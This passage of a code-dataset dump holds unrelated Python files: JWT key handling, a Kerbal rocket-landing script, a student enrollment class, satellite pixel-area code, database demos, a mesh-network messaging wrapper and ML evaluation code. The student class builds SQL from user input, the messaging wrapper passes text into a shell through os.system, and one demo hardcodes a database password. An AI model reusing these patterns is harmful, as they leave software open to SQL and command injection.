GuestProtocol, use_random: bool = False) -> Key:\n \"\"\"Guess key from a various sources.\n\n :param key: a very flexible key\n :param obj: a protocol that has ``headers`` and ``set_kid`` methods\n :param use_random: pick a random key from key set\n \"\"\"\n headers = obj.headers()\n\n rv_key: Key\n if isinstance(key, (str, bytes)):\n rv_key = OctKey.import_key(key)\n\n elif isinstance(key, (OctKey, RSAKey, ECKey, OKPKey)):\n rv_key = key\n\n elif isinstance(key, KeySet):\n kid = headers.get(\"kid\")\n if not kid and use_random:\n # choose one key by random\n rv_key = key.pick_random_key(headers[\"alg\"]) # type: ignore[assignment]\n if rv_key is None:\n raise ValueError(\"Invalid key\")\n rv_key.ensure_kid()\n assert rv_key.kid is not None # for mypy\n obj.set_kid(rv_key.kid)\n else:\n rv_key = key.get_by_kid(kid)\n\n elif callable(key):\n rv_key = key(obj)\n\n else:\n raise ValueError(\"Invalid key\")\n\n return rv_key\n","repo_name":"alonbl/joserfc","sub_path":"src/joserfc/jwk.py","file_name":"jwk.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"8085912944","text":"import math\nimport time\nimport krpc\n\ndef dot_product(u, v):\n return u[0]*v[0] + u[1]*v[1] + u[2]*v[2]\n\ndef magnitude(v):\n return math.sqrt(dot_product(v, v))\n\nlanding_legs_altitude = 15000\nsuicide_burn_ending_altitude = 100\nsuicide_burn_speed_target = 20\nsoft_landing_speed = 6.0\n\nconn = krpc.connect(name='Falcon 7')\nvessel = conn.space_center.active_vessel\n\n# Set up streams for telemetry\nut = conn.add_stream(getattr, conn.space_center, 'ut')\naltitude = conn.add_stream(getattr, vessel.flight(), 'mean_altitude')\nsurf_altitude = conn.add_stream(getattr, vessel.flight(), 'surface_altitude')\n#velocity = conn.add_stream(getattr, vessel.velocity(vessel.surface_reference_frame))\n# speed = conn.add_stream(getattr, vessel.flight(), 'speed')\n\n#get kerbin's body class\nbodies = conn.space_center.bodies\nkerbin_body = bodies['Kerbin']\n\n# turn on air-brakes\nvessel.control.brakes = True\n# retract landing gear for re-entry\nvessel.control.gear = False\n\n# calculate TWRmax for suicide burn\nTWRmax = vessel.available_thrust / (vessel.mass * 9.81)\nprint('Max thrust to weight ratio: {0}'.format(TWRmax))\nvelocity = vessel.velocity(kerbin_body.reference_frame)\nspeed = magnitude(velocity)\nprint('Vessel speed: {0}'.format(speed))\nstopping_distance = (speed ** 2) / ((2.0 * 9.81) * (TWRmax - 1.0))\nprint('Current stopping distance at {0} meters: {1} meters'.format(speed,stopping_distance))\n\nwhile True:\n # wait until we are moving slow enough to deploy landing legs\n if altitude() < landing_legs_altitude:\n vessel.control.gear = True\n break\n\nprint('Landing gear deployed.')\n\nvelocity = vessel.velocity(kerbin_body.reference_frame)\nspeed = magnitude(velocity)\nstopping_distance = (speed ** 2) / ((2.0 * 9.81) * (TWRmax - 1.0))\nprint('Current stopping distance at {0} meters: {1} meters'.format(speed,stopping_distance))\nwhile True:\n velocity = vessel.velocity(kerbin_body.reference_frame)\n speed = magnitude(velocity)\n stopping_distance = (speed**2)/((2.0*9.81)*(TWRmax - 1.0))\n if surf_altitude() < (stopping_distance + suicide_burn_ending_altitude):\n break\n\nvessel.control.throttle = 1.0\nvessel.control.rcs = True\nvessel.control.sas = True\n\nwhile True:\n velocity = vessel.velocity(kerbin_body.reference_frame)\n speed = magnitude(velocity)\n if speed < suicide_burn_speed_target:\n vessel.control.throttle = 0.0\n break\n\n# soft landing:\n# part one: slow to target velocity\nTWRmax = vessel.available_thrust / (vessel.mass * 9.81)\ntarget_twr = 1.2\nvessel.control.throttle = (target_twr / TWRmax)\nwhile True:\n velocity = vessel.velocity(kerbin_body.reference_frame)\n speed = magnitude(velocity)\n if speed < soft_landing_speed:\n break\n\n#part two: target velocity until touchdown\nTWRmax = vessel.available_thrust / (vessel.mass * 9.81)\ntarget_twr = 1.0\nvessel.control.throttle = (target_twr / TWRmax)\ntime.sleep(2)\nvessel.control.throttle = 0.0\n","repo_name":"RyanJHeld/krpc","sub_path":"src/landing/land_first_stage.py","file_name":"land_first_stage.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29017932674","text":"from random import randint\nfrom datetime import datetime\nfrom dateutil import parser\n\nfrom db.executer import execute_query, execute_command\n\n\nclass student:\n\n def __init__(self, name, password, id = \"\"):\n self.name = name\n self.password = password\n self.email = self.name + \"_stu@faculty.edu\"\n print(\"Account created for student {0} with Email {1}\".format(self.name,self.email)) if id == \"\" else None\n self.id = \"S\" + self.name[0:2].upper() + str(randint(100000000,999999999)) if id == \"\" else id\n\n def viewCourses(self) -> None:\n data = execute_query(\"\"\"SELECT id, name, code, doc FROM courses\"\"\")\n for c in data:\n print(\"{0}: course {1} with code {2} being teached by {3}\".format(c[0], c[1], c[2], c[3]))\n\n def enroll(self) -> None:\n self.viewCourses()\n index = int(input(\"Enter an index: \"))\n execute_command(\"\"\"INSERT INTO enrollment VALUES('%s', (SELECT code FROM courses WHERE id = %s))\"\"\" % (self.id, index))\n\n def viewCoursesStudying(self) -> None:\n data = execute_query(\"\"\"(SELECT course_code FROM enrollment WHERE student_id = '%s')\"\"\" % (self.id))\n for c in data:\n records = execute_query(\"\"\"SELECT name, doc, code FROM courses WHERE code = '%s'\"\"\" % (c[0]))\n for r in records:\n print(\"course {0} being teached by {1} with code {2}\".format(r[0], r[1], r[2]))\n\n def unenroll(self) -> None:\n self.viewCoursesStudying()\n code = input(\"Enter course code to unenroll: \")\n execute_command(\"\"\"DELETE FROM enrollment WHERE student_id = '%s' AND course_code = '%s'\"\"\" %(self.id, code))\n\n def post(self) -> None:\n post = input(\"Create a post: \")\n execute_command(\"\"\"INSERT INTO timeline VALUES ('%s', 'student', '%s', '%s', '%s', '%s')\"\"\" % (self.id[0:5] + str(randint(1000,10000)), self.id, self.name, post, datetime.now()))\n\n def reply(self, post_id) -> None:\n reply = input(\"reply: \")\n execute_command(\"\"\"INSERT INTO replies VALUES ('%s', '%s', '%s', '%s')\"\"\" %(post_id, self.name, reply, datetime.now()))\n\n def viewPosts(self) -> None:\n print(\"posts:\")\n data = execute_query(\"\"\"SELECT publisher_name, publisher, post, created_at FROM timeline WHERE publisher_id = '%s'\"\"\" %(self.id))\n for r in data:\n print(\"---------------------------------------------------------------\")\n minuits = int((datetime.now() - parser.parse(r[3])).total_seconds())\n print('\\n'.join([r[0] + \" ({0})\".format(r[1]) + \":\", r[2], str(minuits) + \" minuits\" if minuits < 60 else str(r[3])]))\n print(\"---------------------------------------------------------------\")\n \n def viewTimeLine(self) -> None:\n print(\"Time Line:\")\n data = execute_query(\"\"\"SELECT post_id, publisher_name, publisher, post, created_at FROM timeline\"\"\")\n for r in data:\n print(\"---------------------------------------------------------------\")\n minuits = int((datetime.now() - parser.parse(r[4])).total_seconds() / 60)\n print('\\n'.join([r[1] + \" ({0})\".format(r[2]) + \":\", r[3], str(minuits) + \" minuits\" if minuits < 60 else str(r[4])]))\n print(\"---------------------------------------------------------------\")\n index = int(input(\"Enter 1 to reply, 2 to view replies or any key to view next post: \"))\n if index == 1:\n self.reply(r[0])\n elif index == 2:\n records = execute_query(\"\"\"SELECT replier, reply, created_at FROM replies WHERE post_id = '%s'\"\"\" %(r[0]))\n for record in records:\n m = int((datetime.now() - parser.parse(record[2])).total_seconds() / 60)\n print('\\n'.join([record[0], record[1], str(m) + \" minuits\" if m < 60 else str(record[2])]))\n print(\"---------------------------------------------------------------\")\n else:\n continue\n \n def profile(self) -> None:\n print('\\n'.join([\"student: {0}\".format(self.name),\"Email: {0}\".format(self.email),\"ID: {0}\".format(self.id),\"Enrolled in:\"]))\n self.viewCoursesStudying()\n self.viewPosts()\n \n @staticmethod\n def menu() -> int:\n index = int(input('\\n'.join([\"Enter 1 to Enroll in course\",\n \"Enter 2 to unenroll from a course\",\n \"Enter 3 to view profile\",\n \"Enter 4 to post\",\n \"Enter 5 to view time line\",\n \"Enter 6 to log out\",\": \"])))\n return index","repo_name":"EbraheemTammam/EMS","sub_path":"models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10085007965","text":"'''\nINPUT:\n - S5P (TROPOPMI) L2 product files\nOUTPUT:\n S5P pixel area file (s5p_pixel_area.nc)\nUPDATE:\n Xin Zhang:\n 2022-05-18: Basic version\n'''\n\nimport xarray as xr\nfrom glob import glob\nfrom satpy import Scene\nfrom pyproj import Geod\nimport numpy as np\nfrom functools import lru_cache\n\n\ndef load_s5p(f_s5p):\n \"\"\"Load S5P longitude and latitude bounbary data\"\"\"\n scn = Scene(f_s5p, reader='tropomi_l2')\n scn.load(['assembled_lon_bounds', 'assembled_lat_bounds'])\n\n return scn\n\n\n@lru_cache(maxsize=2**10)\ndef calc_area():\n \"\"\"Calculate area of each pixel\"\"\"\n geod = Geod(ellps=\"WGS84\")\n\n len_x = lon_bnds.shape[0]-1\n len_y = lon_bnds.shape[1]-1\n area = np.full((len_x, len_y), 0)\n\n for x in range(len_x):\n for y in range(len_y):\n # get the corner coordinates\n lons = lon_bnds[x:x+2, y:y+2].ravel()\n lats = lat_bnds[x:x+2, y:y+2].ravel()\n\n # clockwise direction\n lons[-2], lons[-1] = lons[-1], lons[-2]\n lats[-2], lats[-1] = lats[-1], lats[-2]\n\n # get the area\n poly_area, poly_perimeter = geod.polygon_area_perimeter(lons, lats)\n area[x, y] = poly_area\n\n return area\n\ndef main():\n # get example file of low resolution and high resolution\n # because of the along-track pixel size reduction after 6 August 2019\n scn_low = load_s5p(glob('./tropomi/201908/*___20190805T193408*'))\n scn_high = load_s5p(glob('./tropomi/201908/*___20190806T191502*'))\n\n # lru_cache needs global variable \n global lon_bnds, lat_bnds \n\n lon_bnds = scn_low['assembled_lon_bounds'].values\n lat_bnds = scn_low['assembled_lat_bounds'].values\n area_low = xr.DataArray(calc_area(), dims=['y_low', 'x_low']).rename('area_low')\n area_low.attrs['units'] = 'm2'\n area_low.attrs['description'] = 'Area of TROPOMI low-resolution pixels before 6 August 2019'\n\n # clear the cache because the lon_bnds and lat_bnds are updated below\n calc_area.cache_clear()\n\n lon_bnds = scn_high['assembled_lon_bounds'].values\n lat_bnds = scn_high['assembled_lat_bounds'].values\n area_high = xr.DataArray(calc_area(), dims=['y_high', 'x_high']).rename('area_high')\n area_high.attrs['units'] = 'm2'\n area_high.attrs['description'] = 'Area of high-resolution TROPOMI pixels after 6 August 2019'\n\n # merge into one Dataset\n ds = xr.merge([area_low, area_high])\n ds.attrs['description'] = 'Area of TROPOMI pixels'\n\n # set encoding\n comp = dict(zlib=True, complevel=7)\n enc = {var: comp for var in ds.data_vars}\n\n # export file\n ds.to_netcdf(path='s5p_pixel_area.nc',\n engine='netcdf4',\n encoding=enc)\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"zxdawn/S5P-LNO2","sub_path":"main/s5p_pixel_area.py","file_name":"s5p_pixel_area.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6500001986","text":"# Fetchmany-all.py\n\nimport pymysql\n\ndb = pymysql.connect(\"localhost\",\"root\",\n\t\t\t\t\t \"a123456\",\"python\",port=3306,charset=\"utf8\")\n\n# pymysql.connect(keyword argument)\n#(Host,User,password[,purpose database][,port],charset)\n\ncur = db.cursor()\n\nsql_select = \"select * from t1;\"\ncur.execute(sql_select)\nprint(\"select 語句查出的紀錄個數為:\",cur.rowcount)\n\n# fetchmany(n) 取得結果集到第 n 條紀錄\ndata = cur.fetchmany(2)\nprint(\"fetchmany 的結果為:\")\nfor i in data:\n\tprint(i)\n\ndata_all = cur.fetchall()\nprint(\"\\nfetchall 的結果為:\")\nfor i in data_all:\n\tprint(i)\n\ndb.commit()\ncur.close()\ndb.close()","repo_name":"Sapphire0912/Programming","sub_path":"MySQL/MySQL程式碼/Fetchmany-all.py","file_name":"Fetchmany-all.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27515196459","text":"# plot the Pc versus diff\nimport pathlib\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport os\n\nfsize = 15\n\nfile_dir = os.getcwd() + '/'\nmaster_dir = file_dir + '/../../../Results' # gets master directory\nimg_dir = master_dir + '/'\nEthane_4Bar = pd.read_csv(img_dir + 'Ethane_298K_4Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\n# change \"-inf\" to -9\nEthane_4Bar['midpoints'][0] = -9\nEthane_4Bar['midpoints'][Ethane_4Bar['midpoints'] == 2] = 1\nEthane_4Bar = Ethane_4Bar.sort_values(by = ['midpoints'])\n\nEthane_20Bar = pd.read_csv(img_dir + 'Ethane_298K_20Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nEthane_20Bar['midpoints'][0] = -9\nEthane_20Bar['midpoints'][Ethane_20Bar['midpoints'] == 2] = 1\nEthane_20Bar = Ethane_20Bar.sort_values(by = ['midpoints'])\n\nEthane_40Bar = pd.read_csv(img_dir + 'Ethane_298K_40Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nEthane_40Bar['midpoints'][0] = -9\nEthane_40Bar['midpoints'][Ethane_40Bar['midpoints'] == 2] = 1\nEthane_40Bar = Ethane_40Bar.sort_values(by = ['midpoints'])\n\nPropane_1Bar = pd.read_csv(img_dir + 'Propane_298K_1Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nPropane_1Bar['midpoints'][0] = -9\nPropane_1Bar['midpoints'][Propane_1Bar['midpoints'] == 2] = 1\nPropane_1Bar = Propane_1Bar.sort_values(by = ['midpoints'])\n\nPropane_5Bar = pd.read_csv(img_dir + 'Propane_298K_5Bar_CH3_1A/cm3overcm3/' + \"RF_VarImp.csv\")\nPropane_5Bar['midpoints'][0] = -9\nPropane_5Bar['midpoints'][Propane_5Bar['midpoints'] == 2] = 1\nPropane_5Bar = Propane_5Bar.sort_values(by = ['midpoints'])\n\nPropane_10Bar = pd.read_csv(img_dir + 'Propane_298K_10Bar_CH3_1A/cm3overcm3/' +\"RF_VarImp.csv\")\nPropane_10Bar['midpoints'][0] = -9\nPropane_10Bar['midpoints'][Propane_10Bar['midpoints'] == 2] = 1\nPropane_10Bar = Propane_10Bar.sort_values(by = ['midpoints'])\n\ndef process_importances(data, condition):\n # first step, sort by importance, or %IncMSE\n data = data.sort_values(by = ['%IncMSE'], ascending = False)\n # second step, get the top 10, finally sort by midpoints, ascendingly\n Dataset = data.head(10).sort_values(by = ['midpoints'])\n # drop not needed columns\n Dataset = Dataset.drop(columns = ['midpoints', 'IncNodePurity'])\n # round %IncMSE\n Dataset['%IncMSE'] = Dataset.round({'%IncMSE': 2})\n # finally, rename the columns\n Dataset.columns = ['Histogram_Bin' if x=='varnames' else x for x in Dataset.columns]\n newnames = condition + '_' + Dataset.columns\n Dataset.columns = newnames\n Dataset = Dataset.reset_index(drop = True)\n return Dataset\n\nsheets = process_importances(Ethane_4Bar, \"Ethane_4Bar\")\nTemp = process_importances(Ethane_20Bar, \"Ethane_20Bar\")\n# https://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Ethane_40Bar, \"Ethane_40Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Propane_1Bar, \"Propane_1Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Propane_5Bar, \"Propane_5Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\nTemp = process_importances(Propane_10Bar, \"Propane_10Bar\")\nsheets = pd.concat([sheets, Temp.reindex(sheets.index)], axis=1)\n\n# finally, save it\nsheets.to_csv(file_dir + '/' + 'Feature-Importance.csv', index = False)\n#sheets.to_excel(file_dir + '/' + 'Feature-Importance.xlsx', index = False)\n#Temp['Propane_10Bar_varnames'] = Temp['Propane_10Bar_varnames'].astype(\"|S\")","repo_name":"snurr-group/energygrid","sub_path":"Manuscript-Figures/SI/Table S4/Generate_Table_S3.py","file_name":"Generate_Table_S3.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29305789576","text":"#!/usr/bin/env python3\nimport threading, time, subprocess, os, sys, signal\n\nCHANNELS={255,253} #listen these channels (data types)\n\n#\n# https://downloads.open-mesh.org/batman/manpages/alfred.8.html\n# ----------------------------------------------------------------------------------------------\nMSGDICT={}\nRUN=True\n\ndef signal_handler(sig, frame):\n print('CTRL+c. Stopping threads...')\n RUN=False\n al.stop()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# ----------------------------------------------------------------------------------------------\ndef getMac(device: str): #print(getMac(\"mesh-bridge\"))\n cmd='ifconfig |grep \"'+device+'\" -A 5|grep -o \"ether.*\" |cut -d \" \" -f 2'\n p=subprocess.check_output(cmd, shell=True)\n return p.decode().rstrip(\"\\n\")\n\ndef getIp4(device: str): #print(getIp4(\"bat0\"))\n cmd='ifconfig |grep \"'+device+'\" -A 5|grep -o \"inet .*\"|cut -d \" \" -f 2'\n p=subprocess.check_output(cmd, shell=True)\n return p.decode().rstrip(\"\\n\")\n\ndef getIp6(device: str): #print(getIp4(\"bat0\")) #print(getIp6(\"bat0\")[0])\n cmd='ifconfig |grep \"'+device+'\" -A 5|grep -o \"inet6 .*\"|cut -d \" \" -f 2'\n p=subprocess.check_output(cmd, shell=True)\n addrs=p.decode().split(\"\\n\")[:-1]\n if len(addrs)>0:\n return addrs #return type is list\n else:\n return [\"0\"] #no ipv4 addrs to return!\n# ----------------------------------------------------------------------------------------------\n\n# ----------------------------------------------------------------------------------------------\nclass AlfredReceiver:\n def __init__(self, callback):\n try:\n p=subprocess.check_output([\"pgrep\",\"alfred\"])\n except:\n print(\"alfred not running! Please run mesh.py first.\")\n quit()\n self.callback=callback\n self.run=True\n t=threading.Thread(target=self.__receiver)\n t.start()\n\n def __receiver(self):\n while self.run:\n for ch in CHANNELS:\n cmd='sudo alfred -r '+str(ch)\n p=subprocess.check_output(cmd.split(' ')) # p <- { \"22:54:99:cc:14:05\", \"pia Testi 255\" },\n if len(p)>0:\n lines=p.decode().split(\"\\n\")\n for line in lines:\n if len(line)>0:\n #print(\"LINE\",line)\n data=line.split(\",\")[:2]\n sender = data[0].split('\"')[1]\n msg = data[1].split('\"')[1]\n key = sender + \"_\" + str(ch) #key 22:54:99:cc:14:05_253 address_channel\n if MSGDICT.get(key) is None or MSGDICT.get(key) !=(ch,msg):\n MSGDICT[key]=(ch,msg)\n #print(MSGDICT)\n if self.callback is not None:\n self.callback(sender, ch, msg)\n for i in range(0,5):\n if not self.run:\n break\n time.sleep(1)\n\n def send(self, channel, message):\n cmd='echo -n \"'+message+'\" | sudo alfred -s '+str(channel)\n os.system(cmd)\n\n def stop(self):\n self.run=False\n# ----------------------------------------------------------------------------------------------\n\n\ndef cback(sender,channel, msg): #callback when new data (changed) in alfdred\n print(\"MSG:\", sender, channel, msg)\n\n# ----------------------------------------------------------------------------------------------\nif __name__ == \"__main__\":\n k=0\n if len(sys.argv)>=2: #./alfredmsg.py 255 test message\n al=AlfredReceiver(None)\n ch=sys.argv[1]\n msg=\" \".join(sys.argv[2:])\n al.send(ch, msg)\n #time.sleep(1)\n al.stop()\n quit()\n\n else: #./alfredmsg.py\n al=AlfredReceiver(cback)\n while RUN:\n k+=1\n #print(\"main\", RUN)\n time.sleep(1)\n # if k==5:\n # al.send(255, \"Tama on testi\")\n # if k==2:\n # print(getMac(\"mesh-bridge\"))\n # print(getIp4(\"bat0\"))\n # print(getIp6(\"bat0\")[0])\n\n","repo_name":"janttari/raspberry-mesh","sub_path":"alfredmsg.py","file_name":"alfredmsg.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23368661114","text":"import json\nimport requests\nimport multiprocessing as mp\nfrom multiprocessing import Pool\nimport numpy as np\nimport time\n\nclass Indep_test:\n\n serverUrl = \"\"\n\n def __init__(self, serverUrl):\n Indep_test.serverUrl=serverUrl\n\n def createNewSimulation(self):\n payload = \"\"\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n url = Indep_test.serverUrl + \"simulations\"\n\n payload = \"\"\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n # Load circuit represented by graph from uploaded JSON file\n def loadCircuitFromGraphString(self, key, jsonString):\n files = {'file': ('circuit.json', jsonString)}\n\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/loadCircuitFromGraph\"\n\n response = requests.request(\"POST\", url, files=files)\n\n return json.loads(json.dumps(response.text))\n\n def startForAndWait(self,key,seconds):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/startForAndWait\"\n querystring = {\"seconds\": seconds}\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.post(url, headers=headers, params=querystring)\n\n return json.loads(json.dumps(response.text))\n\n # Starts simulation for specified period of simulated circuit seconds and returns immediately\n def startFor(self, key, seconds):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/start\"\n querystring = {\"seconds\": seconds}\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.post(url, headers=headers, params=querystring)\n\n return json.loads(json.dumps(response.text))\n\n def kill(self,key):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/kill\"\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.post(url, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n # Changes specified element property to a given value\n def setElementProperty(self,key,elementId, propertyKey, newValue):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/element/\" + elementId+\"/property\"\n querystring = {\"propertyKey\": propertyKey,\"newValue\":newValue}\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.patch(url, headers=headers, params=querystring)\n\n return json.loads(json.dumps(response.text))\n\n # Returns simulation time when last measurement was performed\n def peekTime(self, key):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/peekTime\"\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.request(\"POST\", url, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n # Returns simulation time when last measurement was performed\n def time(self, key):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/time\"\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.request(\"POST\", url, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n\ndef atomic_sim(n):\n\n utils = Indep_test(serverUrl=\"http://localhost:8090/symphony/\");\n response = utils.createNewSimulation()\n key = json.loads(response)[\"key\"]\n\n jsoncontent = json.dumps(json.load(open(\"/home/nifrick/PycharmProjects/ressymphony/nonlinear_memrist_test.json\")))\n\n inputids = [201, 202]\n outputids = [203, 205, 207, 209, 211, 213, 215, 217]\n\n response = utils.loadCircuitFromGraphString(key, jsoncontent)\n utils.setElementProperty(key, str(inputids[0]), \"maxVoltage\",str(np.random.randint(20)))\n utils.setElementProperty(key, str(inputids[1]), \"maxVoltage\", str(np.random.randint(20)))\n response = utils.startFor(key, 40)\n\n print(\"Fallin sleep\", utils.time(key))\n steps = 20\n start = time.time()\n for i in range(steps):\n time.sleep(0.5)\n print(utils.time(key))\n\n time.sleep(10)\n print(\"Total time per step\",time.time()-start,utils.time(key))\n utils.kill(key)\n\n return None\n\ndef main():\n N_parr=10\n\n p=Pool(N_parr)\n p.map(atomic_sim,list(range(40)))\n # with mp.pool.ThreadPool(processes=N_parr) as pool:\n # outvals = pool.map(atomic_sim,2)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"nfrik/ResSymphony","sub_path":"standalone/indep_test.py","file_name":"indep_test.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70775075715","text":"import unittest\nfrom parameterized import parameterized, parameterized_class\nfrom testsuite.acquisition_functions import saf_mu\nfrom testsuite.surrogates import GP, RF\nimport numpy as np\n\n\n@parameterized_class([\n {\"name\": \"GP\", \"surrogate\": GP, \"args\": [],\n \"kwargs\": {\"scaled\": True}},\n {\"name\": \"RF\", \"surrogate\": RF, \"args\": [],\n \"kwargs\": {\"extra_trees\": True}},\n])\nclass TestSAFMethods(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.surr = cls.surrogate(*cls.args, **cls.kwargs)\n cls.x = np.random.uniform(0, 1, size=[10, 5])\n cls.y = np.random.uniform(0, 5, size=[10, 2])\n\n cls.surr.update(cls.x, cls.y)\n\n @parameterized.expand([\n (saf_mu, )\n ])\n def test_returns(self, acq):\n # test single evaluations of acquisition function\n x_put = np.random.uniform(0,1, size=self.x[0:1].shape)\n ans = acq(x_put, self.surr, self.y)\n self.assertIsInstance(ans, np.ndarray)\n self.assertEqual(ans.shape[0], x_put.shape[0])\n\n # test multiple evaluations of acquisition function\n x_put = np.random.uniform(0,1, size=self.x[0:5].shape)\n ans = acq(x_put, self.surr, self.y)\n self.assertIsInstance(ans, np.ndarray)\n self.assertEqual(ans.shape[0], x_put.shape[0])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"FinleyGibson/dsaf_code","sub_path":"test/test_acquisition_functions.py","file_name":"test_acquisition_functions.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26114373641","text":"import pandas as pd\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom transformers import Wav2Vec2Processor, Wav2Vec2Model\nfrom sentence_transformers import SentenceTransformer\n\nfrom utils.custom_datasets import AnnotationsDataset\nfrom utils.helper_functions import sentence_features_to_device\nfrom utils.speaker_encoder import SpeakerEncoder\n\ndef eval_encoders(hparams):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f'Use CUDA: {hparams[\"use_cuda\"]}')\n\n text_model = SentenceTransformer(hparams[\"sbert_model\"], device=device)\n text_model = text_model.to(device=device)\n text_model.load_state_dict(torch.load(hparams[\"sbert_checkpoint\"], map_location=device)[\"state_dict\"])\n\n processor = Wav2Vec2Processor.from_pretrained(hparams[\"wav2vec2_model\"])\n wav2vec2 = Wav2Vec2Model.from_pretrained(hparams[\"wav2vec2_model\"]).to(device)\n audio_model = SpeakerEncoder(wav2vec2, processor, hparams, device).to(device)\n audio_model.load_state_dict(torch.load(hparams[\"wav2vec2_checkpoint\"], map_location=device)[\"state_dict\"])\n\n def collate_fn(batch):\n audio_paths = []\n sentence_features = []\n labels = []\n\n for example in batch:\n audio_path = example[0]\n audio_paths.append(audio_path)\n\n text = example[1]\n sentence_features.append(text)\n\n label = example[2]\n labels.append(label)\n\n labels = torch.tensor(labels, dtype=torch.float32).to(device=device)\n\n return audio_paths, sentence_features, labels\n\n\n test_dataframe = pd.read_csv(hparams[\"annotations_CS_df_dir\"], index_col=0).reset_index(drop=True)\n test_dataframe.dropna(inplace=True)\n test_dataframe = test_dataframe.reset_index(drop=True)\n\n print(\"test_dataframe length:\", len(test_dataframe))\n\n test_dataloader = DataLoader(AnnotationsDataset(test_dataframe, text_model, device, hparams), \n batch_size=1, shuffle=True, collate_fn=collate_fn)\n\n criterion = nn.L1Loss()\n criterion = criterion.to(device=device)\n\n loss_list = []\n\n criterion.eval()\n audio_model.eval()\n text_model.eval()\n with torch.no_grad():\n running_val_loss = 0\n for i, (audio, sentence_features, similarity) in enumerate(test_dataloader):\n sentence_features = list(map(lambda batch: sentence_features_to_device(batch, device), sentence_features))\n\n vec_1 = audio_model(audio)\n vec_2 = torch.cat([text_model(sentence_feature)['sentence_embedding'] for sentence_feature in sentence_features])\n cos = torch.cosine_similarity(vec_1, vec_2)\n loss = criterion(cos, similarity)\n running_val_loss += loss.item()\n loss_list.append(loss.item())\n print(similarity, cos, loss.item())\n\n avg_val_loss = running_val_loss/(i+1)\n print(f\"Average Loss: {avg_val_loss}\")\n\n print(\"loss_list length:\", len(loss_list))\n \n test_dataframe['loss'] = loss_list\n test_dataframe.to_csv(\"annotations_control_samples_positive_loss.csv\")","repo_name":"TartuNLP/speaker-CLAP","sub_path":"eval_encoders.py","file_name":"eval_encoders.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24962348864","text":"\nfrom os import listdir\nfrom os.path import isfile, join\n\n\npath_webiste='./website/'\n\n# https://stackoverflow.com/questions/3207219/how-do-i-list-all-files-of-a-directory\nonlyfiles = [f for f in listdir(path_webiste) if isfile(join(path_webiste, f)) and 'phobius' not in f ]\n\n\nheader='Home

'\n\nsearch_box='\\n\\n\\t\\t
\\n\\t\\t\\t
\\n\\t\\t\\t\\tLookup String: \\n\\t\\t\\t\\t\\n\\t\\t\\t
\\n\\t\\t
